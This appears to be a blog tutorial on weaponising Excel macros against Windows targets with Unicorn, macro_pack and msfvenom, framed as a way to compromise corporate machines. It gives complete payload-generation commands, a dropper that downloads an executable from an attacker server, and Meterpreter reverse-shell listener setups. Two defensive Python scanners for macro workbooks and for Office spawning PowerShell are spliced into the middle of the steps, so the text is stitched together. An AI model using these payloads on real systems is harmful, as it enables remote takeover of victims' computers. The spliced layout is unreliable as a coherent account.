Hey Folks, as we promised in our previous article, this time we will discuss various methods and tools for exploiting a Windows machine by creating a macro payload. This tutorial can also be useful for corporate employees, because security in companies is tight and a malicious document is often the only way left to compromise machines in a corporate environment.
Let's take a look :) !!
Before watching our first magic trick, you need to know what macros are and how they work, which will help you understand the whole demonstration; for that, go here.
Magic Unicorn is a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. Usage is simple: Magic Unicorn automatically generates a PowerShell command that you cut and paste into a command line window or deliver through a payload delivery system. So let's fire up Kali Linux and install this tool. First we clone the repository with the git command and then change into the tool's directory. Now we are ready to use the tool with Python: all you have to do is change the localhost address and execute the command.
Usage :) !! python unicorn.py <payload> <localhost addr> <lport>
git clone https://github.com/trustedsec/unicorn.git
cd unicorn/
python unicorn.py windows/meterpreter/reverse_https 192.168.1.13 4444 macro
Done :) !! After executing the command, the macro payload is created successfully and the output looks as highlighted in the image below. You can view the contents of the macro payload with the cat command.
Let's move on to the target machine and follow these steps: open Excel -> write any content in the empty cells -> go to the "View" tab -> click on Macros and select the sub-menu option "View Macros".
Enter your preferred name and click the "Enter" button.
Hmm :) !! Copy the contents of the malicious macro payload from the "powershell_attack.txt" file that was created earlier and paste it here. Then press "CTRL + S" to save the document and set the file type to "Excel Macro-Enabled Workbook".
We need to set up a multi/handler to catch the Meterpreter session from the target machine. Execute the following commands, modified for your setup.
use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 4444
run
All the work is done; now, as soon as we open the malicious Excel file on the target machine, we get a security warning on the workbook. To complete this attack, the victim has to click on the "Enable" option.
Oops :) !! After clicking the button, another error appears in the Excel workbook, but in fact the attacker gets the Meterpreter session of the target machine.
Wonderful :O !! As you can see, we got the Meterpreter session of the target machine that easily.
macro_pack is a tool used to automate the obfuscation and generation of retro formats such as MS Office documents or VBS-like formats; it now also handles various shortcut formats. We have to install the Apache web server to host our malicious exe file. To install it, run the following command.
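The workbook saved above is a zip archive whose VBA lives in xl/vbaProject.bin, which is what a mail gateway or endpoint scanner can check long before the file reaches the security warning. The following Python is an added triage example written for this article, not code from the post or from Unicorn; the content-type strings are the real OOXML identifiers, and build_sample constructs a placeholder archive, not a real Excel file.

```python
import io
import zipfile

# Content types Excel declares for a macro-enabled workbook (.xlsm) and its VBA part.
MACRO_WORKBOOK_CT = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
PLAIN_WORKBOOK_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"
VBA_PROJECT_CT = "application/vnd.ms-office.vbaProject"


def triage_workbook(data):
    """Inspect an OOXML workbook (raw bytes) without opening it in Excel.
    An .xlsm is a zip: the VBA code lives in xl/vbaProject.bin and
    [Content_Types].xml declares the macro-enabled content types."""
    r = {"is_zip": False, "has_vba_project": False,
         "declares_macro_workbook": False, "declares_vba_part": False}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return r
    r["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        r["has_vba_project"] = "xl/vbaProject.bin" in names
        if "[Content_Types].xml" in names:
            ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            r["declares_macro_workbook"] = MACRO_WORKBOOK_CT in ct
            r["declares_vba_part"] = VBA_PROJECT_CT in ct
    return r


def should_quarantine(data):
    """Hold any workbook carrying VBA, whether or not the content types admit it;
    an undeclared vbaProject.bin is itself a tampering signal."""
    r = triage_workbook(data)
    return r["has_vba_project"] or r["declares_vba_part"] or r["declares_macro_workbook"]


def build_sample(with_macro, declare=True):
    """Constructed minimal workbook skeleton for testing (not a real Excel file).
    declare=False leaves the VBA part out of [Content_Types].xml, mimicking a
    hand-edited archive."""
    overrides = '<Override PartName="/xl/workbook.xml" ContentType="%s"/>' % (
        MACRO_WORKBOOK_CT if with_macro and declare else PLAIN_WORKBOOK_CT)
    if with_macro and declare:
        overrides += '<Override PartName="/xl/vbaProject.bin" ContentType="%s"/>' % VBA_PROJECT_CT
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types>%s</Types>' % overrides)
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder, not real VBA")
    return buf.getvalue()
```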
apt install apache2
Go to the root folder of the web server and create the payload using the metasploit framework.
cd /var/www/html/
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.13 lport=4444 -f exe >> malicious.exe
Let's move over to the target machine and download the tool from GitHub.
echo "http://192.168.1.13/malicious.exe" "dropped.exe" | .\macro_pack.exe -o -t DROPPER -G "drop.xlsm"
Great job :) !! If all is well, the VBA script is injected into the Excel document successfully; otherwise an error is shown.
Great :) !! Just go back to the folder where the tool was saved, where you will find another Excel file created by the tool. Open that file by double-clicking it.
We receive the same security warning that we saw after the payload was made with the Unicorn tool, which means the payload has been created by this tool.
Done :) !! As soon as the victim enables that security warning, we get that user's Meterpreter session.
use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 4444
run
Now we will try the same thing with a pre-installed tool called "msfvenom". To create a macro payload or VBA script, run the following command. After executing it, leave the terminal as it is and go to the target machine.
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.13 lport=4444 -f vba
Take a blank document and follow the same steps we did above.
After pasting the previously created VBA script here, save the file by pressing "CTRL + S".
Ready :) !! Now you can share this file through various tools or online platforms. When the victim opens the Excel workbook, a security warning appears.
Nice :) !! And the Meterpreter session comes to us as soon as the victim enables the macro option.
use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 4444
run
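All three chains above end the same way from a defender's view: EXCEL.EXE spawns powershell.exe (the Unicorn and msfvenom VBA) or a freshly downloaded executable (the macro_pack DROPPER), and that parent/child relationship is what process-creation telemetry catches regardless of the generator used. The Python below is an added detection example, not code from the post or from any of the tools; it assumes Sysmon-style fields (ParentImage, Image, CommandLine) and runs over constructed sample events whose encoded command body is a placeholder.

```python
import json

# Office hosts that should almost never spawn interpreters or fresh executables.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children a macro typically launches; a dropped exe is caught by the path check instead.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return the reasons (possibly none) a Sysmon-style process-creation
    event (ParentImage, Image, CommandLine) looks like macro execution."""
    reasons = []
    if basename(ev.get("ParentImage", "")) not in OFFICE_HOSTS:
        return reasons
    child = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    if child in SCRIPT_HOSTS:
        reasons.append("office_spawned_script_host")
    if any(seg in ev.get("Image", "").lower() for seg in USER_WRITABLE):
        reasons.append("office_spawned_exe_from_user_writable_path")
    if child == "powershell.exe":
        if " -enc" in cmd or " -e " in cmd or "-encodedcommand" in cmd:
            reasons.append("encoded_powershell")
        if "-version 2" in cmd or " -v 2" in cmd:   # PowerShell v2 downgrade
            reasons.append("powershell_downgrade")
        if " -w 1" in cmd or "-w hidden" in cmd or "-windowstyle hidden" in cmd:
            reasons.append("hidden_window")
    return reasons


def scan(lines):
    """Run classify_event over JSON lines; return (ProcessId, reasons) per hit."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if reasons := classify_event(ev):
            hits.append((ev.get("ProcessId"), reasons))
    return hits


# Constructed sample events (not real telemetry); the base64 body is a placeholder.
EXCEL = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
SAMPLE_LOG = [
    json.dumps({"ProcessId": 101, "ParentImage": EXCEL, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w 1 -nop -enc UExBQ0VIT0xERVI="}),
    json.dumps({"ProcessId": 102, "ParentImage": EXCEL, "Image": "C:\\Users\\victim\\AppData\\Local\\Temp\\dropped.exe", "CommandLine": "dropped.exe"}),
    json.dumps({"ProcessId": 103, "ParentImage": "C:\\Windows\\explorer.exe", "Image": EXCEL, "CommandLine": "EXCEL.EXE report.xlsm"}),
]
```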
Note: We have done all these demonstrations in a lab environment.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.